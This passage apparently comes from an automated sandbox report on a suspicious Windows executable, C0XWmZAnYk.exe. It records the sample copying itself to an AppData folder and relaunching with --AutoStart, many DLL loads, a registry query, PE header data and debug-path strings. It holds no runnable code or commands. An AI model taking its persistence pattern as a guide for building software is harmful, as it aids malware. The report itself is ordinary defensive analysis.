        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: drprov.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: ntlanman.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: davclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: davhlpr.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: browcli.dllJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: drprov.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ntlanman.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: davclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: davhlpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: browcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ncryptsslp.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeSection loaded: ncryptsslp.dll
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C0XWmZAnYk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: C0XWmZAnYk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: C0XWmZAnYk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: C0XWmZAnYk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: C0XWmZAnYk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: C0XWmZAnYk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: C0XWmZAnYk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\40\ source: C0XWmZAnYk.exe, 00000006.00000003.2380241089.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2379563679.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357107543.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357189135.000000000317E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: WINLOA~1.PDBwinload_prod.pdbansferApiGroup1cbec1a0a32156f64ec8d93ea2b3bdd source: C0XWmZAnYk.exe, 00000006.00000003.2515987538.0000000003117000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2516084073.000000000311B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\-G\Gt source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: C0XWmZAnYk.exe, 00000006.00000003.2357107543.0000000003113000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: C0XWmZAnYk.exe, 00000006.00000003.2674658617.0000000003497000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2515987538.0000000003132000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393316611.000000000314B000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393292141.000000000313D000.00000004.00000020.00020000.00000000.sdmp
